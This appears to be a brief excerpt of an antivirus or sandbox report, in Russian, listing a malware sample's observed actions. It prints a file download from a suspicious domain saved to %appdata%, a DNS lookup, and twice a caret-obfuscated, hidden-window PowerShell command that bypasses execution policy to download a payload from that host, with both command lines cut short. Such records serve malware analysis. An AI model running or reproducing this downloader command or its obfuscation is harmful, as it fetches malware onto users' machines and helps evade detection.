Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^ER^SH^e^Ll^.E^XE^ -E^XE^cUtion^Po^l^I^C^y bYpasS -NOpRoF^IlE -^wi^N^dowsTY^LE ^HiDDeN^ (nE^W^-objEcT S^yStE^m.^Ne^t.w^E^bCLi^en^t).^d^o^Wnloa^DF^i^LE('http://footarepu.top/re...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "PoW^ER^SH^e^Ll^.E^XE^ -E^XE^cUtion^Po^l^I^C^y bYpasS -NOpRoF^IlE -^wi^N^dowsTY^LE ^HiDDeN^ (nE^W^-objEcT S^yStE^m.^Ne^t.w^E^bCLi^en^t).^d^o^Wnloa^DF^i^LE('http://footarepu.top/re...' (со скрытым окном)